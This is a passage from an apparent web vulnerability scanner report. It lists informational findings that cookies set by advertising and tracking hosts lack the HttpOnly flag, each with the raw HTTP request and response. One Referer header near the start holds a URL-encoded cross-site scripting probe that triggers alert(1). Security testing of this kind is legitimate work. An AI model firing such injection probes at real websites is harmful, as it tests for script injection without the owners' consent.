The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x1743 HTTP/1.1
Host: rs.gwallet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: ra1_uid=4639578929876828096; ra1_sid=22; BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=

Response

HTTP/1.1 200 OK
Content-Length: 140
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4639578929876828096; Expires=Sun, 16-Sep-2012 17:04:29 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=J7X1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sat, 17-Sep-2016 17:04:29 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://bh.contextweb.com/bh/set.aspx?action=clr&advid=3420&token=RORO1" width="1" height="1" border="0"></body></html>
13.155. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=53&pbi=36&ord=6344495 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgsp=eV/lKTwBeV98GzwB; lgpr=yVfKV85Xz1cWYNFXeV+kWKVYx1c=; lgtix=NQAQAEABBgABADMBSQABADMBHAAoADUBDAABADMB/QADADYBXwABADMB

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:21:29 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQASAEABBgABADMBSQABADMBHAAoADUBDAABADMB/QADADYBXwABADMB; path=/; expires=Tue, 16 Sep 2014 16:21:29 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 0
Connection: close

13.156. http://s.xp1.ru4.com/coop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /coop

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coop?action_id=4&version=old&nocache=0.9566912 HTTP/1.1
Host: s.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: X1ID=BO-00000000521444319; O1807966=768; P1807966=c3N2X2MzfFl8MTMxMjc2OTY3N3xzc3ZfYnxjM3wxMzEyNzY5Njc3fHNzdl8xfDI4NTQ0NTM5OHwxMzEyNzY5Njc3fA==; C1621610=0@33

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 17 Sep 2011 16:48:25 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Set-cookie: O1807966=768; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Set-cookie: C1621610=0@33; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Set-cookie: X1ID=OO-00000000000000000; domain=.ru4.com; path=/; expires=Sat, 17-Sep-2041 12:48:25 GMT
Location: http://s.xp1.ru4.com/coop?action_id=4&version=old&test_flag=1
Content-length: 0
X-Cnection: close

13.157. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=14531;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/UJ3/iview/295138956/direct/01/6447245?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B234716514%3B0-0%3B1%3B33263296%3B4252-336/280%3B40530567/40548354/1%3B%3B%7Eokv%3D%3Bsz%3D336x280%3Btile%3D2%3Bpos%3D4%3Bsite%3Dseventeen%3Bsect%3Dindex%3Bsub%3Dindex%3Bsubsub%3Dindex%3Bpage%3Dhomepage%3Bcat%3Dother%3Bsubcat%3D%3Btool%3Dros%3Bartid%3D%3Bkw%3D%3Ba%3D%3Bb%3D%3BmtfIFPath%3D/cm/shared/admeld/%3Bgame%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G14853=C1S98373-1-0-0-0-1315398787-0; G15493=C1S99917-4-0-0-0-1315313090-907727

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G14531=C1S102386-3-0-0-0-1316276740-852; path=/; domain=.suitesmart.com; expires=Thu, 15-Mar-2012 16:39:52 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:39:52 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...
13.158. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/donatemydress_us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/303/hearst_us/728x90/donatemydress_us

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/303/hearst_us/728x90/donatemydress_us?t=1316294771335&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.donatemydress.org%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1010
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:33:29 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
13.159. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/303/hearst_us/728x90/misquincemag_us

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1121
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:34:39 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
13.160. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf?t=1316294786641&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.quickandsimple.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1308
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:36:43 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
13.161. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686626

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295065618&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1022
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:29:53 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
13.162. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686642

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:23:43 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
13.163. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61721100

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61721100?t=1316295060880&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1022
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:29:49 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
13.164. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/728x90/ht_1064834_61686626

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316295397553&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2Fflashtalking%2Fftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A%2F%2Fmpc.mxptint.net%2F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26cachebuster%3D272524.66208301485%2526ftguid%253D1343AC00FD7B0F%2526ftcfid%253D237666001%2526ftoob%253D%2526ftsg%253Dadg&refer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686626%3Ft%3D1316295375688%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1046
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:35:25 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
13.165. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/728x90/ht_1064834_61686642

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/610/hearst/728x90/ht_1064834_61686642?t=1316294711579&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1418
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:24:00 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
13.166. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61721100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/728x90/ht_1064834_61721100

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/610/hearst/728x90/ht_1064834_61721100?t=1316295053861&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1011
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:29:42 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
13.167. http://tag.admeld.com/ad/js/610/hearst/300x250/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/610/hearst/300x250/ht_1064834_61686626

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/610/hearst/300x250/ht_1064834_61686626?t=1316295404213&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61721100%3Ft%3D1316295386536%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=802568.8005145639%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 787
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 16:35:31 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:300px,height:250px;margin:0;border:0'>");


document.write(unescape('%3C%21--%20begin%20Undertone%20Ad%20Tag%20for%20INT894QH-Tier1%20-%20Medium%20Rectang
...[SNIP]...
13.168. http://tag.admeld.com/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /match?admeld_adprovider_id=24&external_user_id=2944787775510337379 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&mktid=&mpid=&fpid=4&rnd=3386002689603567146&nu=n&sp=y&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 35
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:37:58 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

GIF89a.......,.................D..;
13.169. http://tag.admeld.com/nai-status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /nai-status

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai-status?nocache=0.6197763 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
